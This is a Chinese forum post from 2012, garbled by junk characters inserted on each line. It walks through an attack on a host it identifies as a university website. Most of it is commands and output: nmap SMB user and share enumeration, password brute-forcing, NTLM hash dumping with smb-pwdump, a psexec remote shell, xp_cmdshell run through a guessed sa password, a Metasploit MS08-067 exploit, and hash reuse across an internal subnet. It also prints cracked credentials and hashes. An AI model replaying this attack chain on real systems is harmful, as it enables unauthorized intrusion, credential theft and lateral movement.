广西师范网站http://202.103.242.241/+ H3 n* w( z1 [" t) U1 Z- X
0 J2 }3 @' U' f' S6 H. E# z. O! X6 zroot@bt:~# nmap -sS -sV 202.103.242.241
9 N2 \1 A9 N7 N$ ~- E r+ ^# r0 ~( @; `9 q
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST9 w/ o) P& m# P; M3 d
$ v5 m# P+ N; tNmap scan report for bogon (202.103.242.241)
; j& d, i+ F6 I" A; Q X" _+ y: O r3 J" N8 H0 G& c
Host is up (0.00048s latency).
9 `: @7 e0 G# M! T8 d* W3 {3 r6 {" R/ w4 J0 D
Not shown: 993 closed ports: W4 I% F/ S8 c9 R6 W5 @
% u2 a+ {. R" y6 O! n1 D f+ z1 v* qPORT STATE SERVICE VERSION) M9 e% s" \8 B5 d+ |, g% |- z7 P
0 d2 z: k; c3 ^4 }, S1 f: F& O
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)) _7 X+ [/ p4 n A F
5 Z$ u) b, P' B) u* O$ X139/tcp open netbios-ssn0 V- X: L4 ^, [; q4 C; F, B) r
6 C$ O. Y$ H- N* n) S3 [: q
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds; \; R2 v8 M, K# `2 b0 q
' V& A m& G0 m3 {* ]1 S
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)4 d- f B8 d* v* m7 Q
- b4 D& u+ k q2 s1026/tcp open msrpc Microsoft Windows RPC
. S' y$ a7 p: R4 k& h/ W% {
* i% f; @: ^ R, ^3372/tcp open msdtc?! h" Q; a7 W4 P! _2 F$ b- b' j
# F( Z/ w6 \% B4 l+ t6 R
3389/tcp open ms-term-serv?+ s$ [0 R' i* u/ X* C c
+ m5 _% _0 V+ ]. X% U- \
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :* k8 i# R: y5 o% O9 c0 A- N
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r7 w, |& _5 t0 P; f) P9 a
: V$ f. U9 v' n5 N3 d5 }7 LSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
; V0 y2 U: G$ V1 v" D4 G/ O/ s- v
6 n; n* t( K. c1 v( ~* X. Z$ FSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
3 d5 p+ U% ]9 Z: q9 t0 e" W
( F$ y9 R2 F5 d3 g' v. S0 n0 ESF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO* A+ N% Q( k) u6 a) G$ v" N
1 B" A8 X" [: ~3 j) {5 p* T
SF:ptions,6,”hO\n\x000Z”);
2 q2 s$ m" g5 K9 z, D4 a4 T4 Z+ }# B) I2 V
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)8 @% ], ^# o- e2 g
: ~( Z4 F2 @9 u' X/ EService Info: OS: Windows* I4 r, f$ ?; @9 M
& P4 ~! j+ H7 W6 c, X
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .) `. n, l1 o" F1 {6 x0 X; d8 N
7 V, D5 Y7 g$ q3 t7 W
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
8 F7 o. v% d" @# k- P. Y6 N7 y Z, e8 O
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
' {7 e1 m% d! @# K& P" z$ r. I) F$ B- S! H1 l
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse$ ]% e7 P# C, |) T8 x! m. I
" f; _7 _4 c, \1 M: O-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
! X& w! Q6 v+ ^8 x# a* V8 n* c. A6 m- w
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
8 p8 n `1 T& p+ i+ s n- e- H, g. g# L I$ z1 E% o
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse9 ]/ Z) Q- k) K0 z% }' I/ S
" B. z2 o' z* L4 y6 h5 G+ e) M2 Q, T
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
0 m! H4 ?" A9 q7 F8 s3 d
1 N# n, H: u% b3 h5 ~3 b0 r9 Z [-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
& H6 Y; V6 V) u1 P# q9 G! h; t) J9 A+ _6 i6 C
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse5 H( w$ F: w2 I/ o# A6 i
! H" S+ K$ X% x2 G
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
! u% v7 C+ j7 f- S0 t( }( w$ F
/ t* w1 w4 n8 |6 N% I8 V4 h-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse: G2 [) k, P: H: g
' W6 n+ o. G' i* U" u# D
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse1 I* M- a3 Q9 I$ q M
% ~ v1 S# r8 e/ o& ~ F: C-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
7 v3 v: n2 H2 n% _, x
; H$ d6 _ V, W t-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse# m+ b+ ^5 J: I$ y; n( T
4 ?. e5 o' Q2 @4 l
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
. |; }4 p& G. ^+ ?/ _- C- ~; s- \) t* p* ~+ ~$ g& |* X3 t
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse8 B! s6 s$ N- ^" z1 b
- Q( Z8 e3 U V" X( L, M-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
# \: B' w1 G* q$ R* K }4 K
9 Z( F1 o0 u' n+ h1 ^root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 1 {7 O3 \6 {$ B# K. L X* \
% p& m* X1 G3 L+ C; L6 }8 ?//此乃使用脚本扫描远程机器所存在的账户名9 A( [$ U/ Z, N
9 J3 ~& K% [# P. ~3 FStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST# M" M3 I4 g" ^& X! V+ S7 k) t
$ U8 E( R7 q# ]. T9 H7 i2 y
Nmap scan report for bogon (202.103.242.241)0 @# d9 P+ t3 S" U2 }
+ s# O7 _0 O/ ^& B" Z ?
Host is up (0.00038s latency).1 r2 m$ }! f6 N! ~4 w
+ L1 ?" T2 Q5 H& k+ ^: v+ F
Not shown: 993 closed ports
7 M/ T* u1 ?( }" B7 A2 Y0 b3 L `, z4 U4 d
PORT STATE SERVICE
! E' ~ z0 ?# u) I/ ~1 t
$ ~; y- {4 T$ m4 |2 f/ n6 v135/tcp open msrpc5 ? y+ z6 n$ S+ i2 ^
" o0 c. q; }, A( i* b x- w/ Q139/tcp open netbios-ssn
5 w8 G8 P* `) S$ K3 `3 `! @- F
4 x. }/ G3 [$ ~9 i+ P# q445/tcp open microsoft-ds+ r* \- _" N: V" [8 T
6 }1 y+ z6 Q+ @# _1025/tcp open NFS-or-IIS
3 ?4 u# [! N8 s# m$ x
& v% `& m% Y: o' c. y* `1026/tcp open LSA-or-nterm8 m p# p) Q9 K. B- D+ D
! T6 U* A% M5 k( h) z1 {3372/tcp open msdtc) w4 u9 W% y9 B) l3 D! }
( f3 K+ |* r; d" R* r) a3389/tcp open ms-term-serv7 f. e V+ C7 c) Y, I
& c. ^2 y8 v* \: y! U5 z9 HMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
9 r2 V! J- Q7 G. `7 b; h
7 ?; G% g& D% e, _* B# p H1 @: BHost script results:
& c: I/ g! t/ N! [5 K8 U# p4 F0 [, h) c
| smb-enum-users:4 N- Z) N, S4 b5 Q. i" q
/ w& K; k$ _5 a; I+ I|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
% p" l8 H) W9 N% Z! M5 C
) `( x; ] Z3 U6 c* qNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
/ W# f5 _7 n% g j% g; |: r1 k6 H a) }/ Q7 a
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
: J+ v2 M, G3 _ l# P5 a
; Y: d/ a% K. l9 M" Z. F0 J//查看共享# Z9 C% R, x; g# F, q
5 P8 C. l' s! v' u( o% p; ^Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
/ k9 j7 H. w0 T/ H! v2 o
+ ~! g; K; H# W$ D: n7 p+ ~Nmap scan report for bogon (202.103.242.241)) p" l/ \4 k) `) R4 |
. [+ o: ~ [( W) tHost is up (0.00035s latency).: l; d5 s: S+ a- ^. ]/ d8 l9 Y7 e
- L/ `" G) L% G/ f9 C: ^Not shown: 993 closed ports& j. n. c( s: P) b6 b
0 `! |( {8 d* c8 T3 N8 ?6 X6 `
PORT STATE SERVICE. ^2 J/ B- s8 h Q1 f! {; ]4 X
; Y: U4 |, v& u% q+ j3 I7 L: {135/tcp open msrpc. u+ y& Y2 O7 a8 R" l; O% |
9 T. R& I$ h, N. Q* y. \1 A( [139/tcp open netbios-ssn
& N# ?" u! i/ ?- `2 {
[; ]8 `. t2 s2 o445/tcp open microsoft-ds7 V# u/ j7 B- t* `: n
' \9 c+ w$ Y) b1 m3 z5 x1025/tcp open NFS-or-IIS7 c$ L4 ~$ b- Z8 Z) C( A
) G1 M# n/ b7 b' Q8 A' V, k- D1026/tcp open LSA-or-nterm
4 B( J! c$ X! U4 h8 W8 s- H( ^2 o/ z c
3372/tcp open msdtc
/ ^7 u; n& r' S. t
+ A" w+ G6 V. c& B/ D/ j3389/tcp open ms-term-serv
z! U0 Q/ x+ K# t. m
2 y% v: B0 Z; P5 S1 p8 O' LMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)3 P' I+ Q; n6 x1 M+ c
% Y. A% S: S1 G
Host script results:
' h8 ?, b( I8 g$ D n7 q9 R U- k* I0 Y# |9 F8 b1 k
| smb-enum-shares:
: A# Z& g% e. c2 ?' W: M) o
" S; V: U! ?/ C* y| ADMIN$0 A* ^) Q4 b$ Y7 m( r* M" a8 q
! N/ @2 w% l% y" p8 V) l2 T1 N| Anonymous access: <none>! W& ~0 t& S G- a
N% f! }8 Y, j6 ]: X8 N. Y% w# Y| C$
, j& b+ `& r. w. p6 @: F3 N/ m- {$ t
| Anonymous access: <none>
$ q' G# p8 \. \1 l' p6 l
6 E9 c3 W( S+ o d& q- B; B1 }) b| IPC$( i6 G. U5 C" a7 A3 t& p. }7 o
+ @5 O. m! b# H( Y! Y4 @( I
|_ Anonymous access: READ
4 A" e! U* P B, e, B) H4 s1 Z q( b2 r+ H% a2 d
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
' l6 R( x0 A1 A- h
9 l1 [ q! ]# ^8 n) u W( [2 W, Uroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 . w9 Q2 t. L+ u1 J$ j) x) W5 h
- l5 B, {7 {, n6 @& T0 q//获取用户密码
" ^ n1 A3 j& Q2 {+ ?" p8 J- w2 [4 M) E( J8 v- G% z0 A8 a
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST; x) ]9 z+ g6 V% h5 ^
# ~9 Q6 d5 S a2 H, b
Nmap scan report for bogon (202.103.242.2418)# S3 D6 I& m3 a. P% `: ?' o
. _& A% i- u' l5 [Host is up (0.00041s latency).
- K6 [" L% w+ M7 R) N: N) J* C
- q" f8 U% o+ [: q) }Not shown: 993 closed ports
3 V9 Z% B- X1 |9 l
5 ?& t* J: l( Z6 y' |3 h& [3 b! cPORT STATE SERVICE
- }. L8 ?3 Y6 U* Y8 Y7 f* Z5 U9 L2 r
/ W8 d! G* K& d& F135/tcp open msrpc
& g$ v5 X5 Q. ~! I( O" h6 v* H" n/ E$ `( y! X& W$ ]
139/tcp open netbios-ssn( x E. m/ w2 O9 e
1 O8 `6 B" X F/ c8 M6 ]3 _
445/tcp open microsoft-ds" b$ k5 Z' z& c
b1 J, v' i7 D* ~9 V1025/tcp open NFS-or-IIS
2 W* @& r1 A8 W, R2 w
8 r* C% r; `7 D8 f1026/tcp open LSA-or-nterm
+ w! A- B3 q+ }
( K2 E3 m5 P, k5 N( j1 W6 U3372/tcp open msdtc
( b3 ~% C( J7 j
+ ]+ I+ F s. l+ j, `4 m& S: A3389/tcp open ms-term-serv
3 t$ F2 Z) J- S+ B8 D8 E2 W! }4 e p7 Y
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
, t. K, I0 a& J* w0 c d
5 a3 k$ t+ T5 o( \9 ^# G6 qHost script results:
9 E: P+ u6 T7 F/ ?1 W
8 @; F8 f3 M; b| smb-brute:
6 ]' l" z1 }6 [9 f5 s/ H
9 G- a7 I# |5 N' F3 g3 Iadministrator:<blank> => Login was successful
( p# M4 w- Q' H K! x/ V
; |% d- `" p$ C) D- n" M3 E|_ test:123456 => Login was successful
) S/ k; E$ o' p5 d9 }
$ k' q( ]# k; [$ b kNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
7 X: y; J1 n& R' ~" n' e8 V: F8 M7 E
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash3 B* R5 q; p$ h+ d q0 t; t
3 S: U( l0 s: q: x" f+ @- H0 Wroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data n) n' D, T3 F" J5 J2 C# F
# u. p& O# o% droot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
- U( U. v# j! t: \$ P1 O
! r( t+ \3 k% m7 Nroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
+ I7 l$ `) @. f5 d
6 Z& \3 T- H5 @; _Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST3 ?& J) S' \7 N0 F8 j- T
% O8 q8 Y) c( ^. P8 z) b5 {. bNmap scan report for bogon (202.103.242.241)5 `! ] S/ C0 A- x9 o
8 s8 i6 k+ M" ?$ T5 U6 v0 P2 s& WHost is up (0.0012s latency).
1 a1 G. S4 O+ z6 x" J, V4 g2 B! }- v. a9 I: F. u# `; Z
PORT STATE SERVICE
2 `/ f9 a: q8 t4 k1 p8 Z7 z R0 O E2 z* Z& F! A
135/tcp open msrpc
1 b8 t. T8 w: j4 E3 _- G
4 \$ d: F% i# V0 x: D/ M7 ^) c139/tcp open netbios-ssn8 B( `+ E+ v5 X6 ~# Q* V( n9 Z
! K0 J; M- ]" A5 M( I445/tcp open microsoft-ds
9 v5 j, h3 z8 D- q4 b$ l8 m5 s+ ]4 t* x) [- K8 t" H/ k
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)8 O) p* I9 L, M- d+ ^+ R
" k' z p6 d6 e( ~$ B& U' Z
Host script results:2 N% D; U0 H2 E3 {
8 x- P* a. M' {' u; O# q; v; P| smb-pwdump:/ C8 }, P0 V( u
; N) e( O% z0 e. q3 J4 t| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
6 c: _: P/ o( Z/ q# T) G
$ ]: x- M4 g" g0 q0 \| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************& m2 B! `1 z% b; k
- X% ^7 j- e& q0 Y, g$ O# X| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
2 t$ L/ r- } k K
" z/ R# I- N9 Y& I9 V6 V|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
' E7 l8 }% w- R" W% r( N4 q' U A5 y9 S" y8 y
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds% F+ i: {9 E: v/ d
! { c5 {, f" t* VC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell) ]( m, d" n* g/ V
" ]! d) h" ]$ T1 w% U/ |
-p 123456 -e cmd.exe; w/ v. o8 ~) ]* R! b1 X
& B4 ^2 Z$ H* m$ Q( k+ ]
PsExec v1.55 – Execute processes remotely
) `4 E- e |6 m, G# W
( z% R N, o$ j& a/ r2 jCopyright (C) 2001-2004 Mark Russinovich
; N; b9 v* F+ o& b z
& f- P5 B6 E+ Q- F& vSysinternals – www.sysinternals.com8 m" \1 w G. e& x. {; g
5 ~1 n5 {% ?) l |& `6 l) L
Microsoft Windows 2000 [Version 5.00.2195]
! t( p. R4 u8 n, T X' h
. F+ Y% W7 G4 x6 @(C) 版权所有 1985-2000 Microsoft Corp.
: G5 b0 _9 ]0 q3 y, n& D0 o+ q' _8 g, F
C:\WINNT\system32>ipconfig
" g/ T% O6 y H; W' A4 G$ B3 |* w5 N! e- K4 |% H
Windows 2000 IP Configuration7 J/ f$ @ y0 c$ |% f2 t3 F1 m
7 r: l, c; {8 W$ X4 H" A! ^4 X
Ethernet adapter 本地连接:
2 n8 Q( k9 S# m3 ^
) y# l5 j2 E! g) e. tConnection-specific DNS Suffix . :% c1 _) |9 K% u
; X$ m4 N- {8 DIP Address. . . . . . . . . . . . : 202.103.242.241
9 J. j# M6 B: s" @/ N$ S. }" Q+ e* R2 d' i- ^- T) c
Subnet Mask . . . . . . . . . . . : 255.255.255.02 T# @3 B! W! F% i$ Q
( K5 |* X) O; t9 jDefault Gateway . . . . . . . . . : 202.103.1.1
* b' t f8 \' c$ ~; [& z2 W/ s" c( `* }7 x) ~/ B- ]
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令 H+ ?- j) l. b; ]; `$ R1 ~& t
* R; _% d. a, Q# i& broot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞6 D8 P$ T D$ @3 ] H* ~* i# O
; n1 D+ s X' t6 C( v* ~Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
5 S; |7 R) J# z7 ~6 s# M+ s# N" O6 h+ ?, E: `& o/ G
Nmap scan report for bogon (202.103.242.241)
6 O' {& O& Q" h( U" M& U/ _0 S+ _. r/ `, \
Host is up (0.00046s latency).6 M8 I1 o2 t' U% c5 [% p8 L _
5 F; H% g: Y+ U' K) q Z( A
Not shown: 993 closed ports" V) \' X$ |5 f* _- U
9 S/ \+ S) t8 a, N
PORT STATE SERVICE! M$ M$ @5 K+ ^3 N* A2 f
/ t8 ]8 t; f4 B135/tcp open msrpc
, _7 P' d& _3 B. K& Z- K$ P
3 Q4 j. ~4 \1 Z9 a6 ] l139/tcp open netbios-ssn; O4 V& f* V7 N3 t3 b
_8 M9 a Q: Y3 k, }& P
445/tcp open microsoft-ds
9 G" K, h' O4 O3 m+ M7 V& P) R1 k7 {0 O" G# _, T) Z+ [$ w+ V2 B% W' I
1025/tcp open NFS-or-IIS
' k H( [& c( ]( [* d$ s- Q7 v" R3 h# { j# x9 K$ [$ o
1026/tcp open LSA-or-nterm; t& {6 | i7 `& D
) ~( H, `! U. Q% |* B# t$ b3372/tcp open msdtc
1 ~* U# p7 D, A5 w
. j; N" x; f' O. t$ O0 n3389/tcp open ms-term-serv% D+ v" }3 n0 t/ p- ?
" C/ A1 y* e! Z3 v; m
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
: l/ S! S% J0 f( q4 H. a1 h
+ X; w" l. R0 r# |7 G% _' {' z. T! cHost script results:
) T! i: u7 P% s0 e$ h5 s: M4 k5 R0 q1 r# b0 G0 h. ]
| smb-check-vulns:% K4 u- W2 O$ Y
5 Z3 o2 b" l4 @/ U. d4 G
|_ MS08-067: VULNERABLE, f: [# F; A* p5 P& |5 \, G6 \
% U M' D, B# o( j$ g! h7 WNmap done: 1 IP address (1 host up) scanned in 1.43 seconds, P& h8 u" l' I/ }8 C
G. T1 K- L0 F# l" W# b$ y
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
+ m1 Q! ~# }- t ^: E3 n- U
% L1 _5 N7 y& \' E6 C w: mmsf > search ms08
' u; Q( Z' T4 l8 W D4 I3 N- |
5 i6 q8 [; H5 E5 c& M3 Cmsf > use exploit/windows/smb/ms08_067_netapi
/ f, A2 S. g" ? C3 f2 Y5 k+ N: x
# C: f3 F2 E3 y( c- L( r# ?& ]msf exploit(ms08_067_netapi) > show options" O" J3 L: d# ?/ s7 ]: _) a
X; u% P! m; R6 t/ Xmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241; R1 ]" I( ]# P5 Y# v1 [5 K. d
! g6 Z& }" z3 d2 t! d, N3 l2 t
msf exploit(ms08_067_netapi) > show payloads/ w" _8 A8 |, R/ l! e9 H; h
) V M2 i, ^6 ^1 ~msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
) [) `2 @, u. \, ]6 G1 j$ H+ j- Z2 q. j/ d# X
msf exploit(ms08_067_netapi) > exploit7 `9 L0 W( J: X! Y; z
; x2 Y7 z0 g- V2 C7 Ameterpreter >7 o4 [( x2 S u. A6 {3 ~: a' P# L
" Q' `( H5 j4 W: x
Background session 2? [y/N] (ctrl+z): l3 g' y# p( W/ W, J5 U7 y" d/ d
; L/ ^$ ^, \% e- J0 D
msf exploit(ms08_067_netapi) > sessions -l
( ]% ?, C% {% b9 f2 L, C5 s* h% _8 l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
5 \) S. X. `/ |7 C7 e
S8 b, T$ o8 ]# atest
- R8 r! z5 H) X7 ^! X3 L4 ?1 q; K% w0 W
administrator
7 N, U7 F& }' B S0 i0 O7 `$ R" H- z. |7 X# Y$ a
root@bt:/usr/local/share/nmap/scripts# vim password.txt
9 [7 o+ B0 o' F9 H7 I+ o3 ]/ e- P' w- P+ z2 H* ~2 n0 a, |8 t1 \
44EFCE164AB921CAAAD3B435B51404EE
0 s0 v7 B' {6 Y0 h/ S) A R t% C; _6 e5 Y
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
" |* F& t; S$ ^2 m" U: i: Q4 F) S" [* R5 [5 R
//利用用户名跟获取的hash尝试对整段内网进行登录
6 c, h6 m C( U' ]# a3 d$ d+ U- X2 v+ R5 s
Nmap scan report for 192.168.1.105- C: G+ _( E$ Y- D0 a- O' h* f
7 |) i6 |# L2 |1 h* Y0 i- t
Host is up (0.00088s latency).
2 v, p3 z' N0 ~
9 W1 f$ ~) q2 e/ PNot shown: 993 closed ports6 D ]" E4 @, X2 ], h4 Z4 K
+ E/ `$ u: `3 P/ IPORT STATE SERVICE; X& s" k G3 s d& r7 O, r9 M% d
: X: v# m" N9 M9 w- a135/tcp open msrpc
# c U3 M5 J$ O @! a- g6 n9 j7 v8 H! C' i% \
139/tcp open netbios-ssn
$ P4 U! D/ X2 K) T4 R% B7 M. S* m9 A* T- a9 @
445/tcp open microsoft-ds2 W, ^( @6 {* u" f
. X; J$ w1 _$ [7 ?$ [1025/tcp open NFS-or-IIS% \6 a: M9 t/ |/ W
& H9 y' l- ]' z* ?1026/tcp open LSA-or-nterm" x; A5 e4 m. u. k8 ^
4 g0 k7 i! K7 m( q9 f a3372/tcp open msdtc
2 a; t+ M, G( v6 `
5 [2 I, W4 K0 r2 G, i0 e3389/tcp open ms-term-serv( f& f, U) ^) n7 w& ^. G7 j
1 Q* \3 t! C* s( n# y
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)& ~' T( W: @: W( E! | E# \; r8 f! H
/ z% a' _7 f% O& N; s' W2 THost script results:4 E" Q# E( n7 J @1 g
* h9 C- W' N* U+ v5 e
| smb-brute:1 z0 M z- n, j1 u/ s* o7 y/ N
6 j z: ]4 V0 ? r|_ administrator:<blank> => Login was successful
. {& i8 e+ @0 z# m
5 D4 x9 Q. n6 r" P! V$ Q ?. M' f攻击成功,一个简单的msf+nmap攻击~~·9 S9 A( [& ~/ N3 }7 ]+ I3 e
1 x; Q( b" ~0 F8 Q6 }0 E |
发表于 2012-12-4 12:46:42
收藏
支持
反对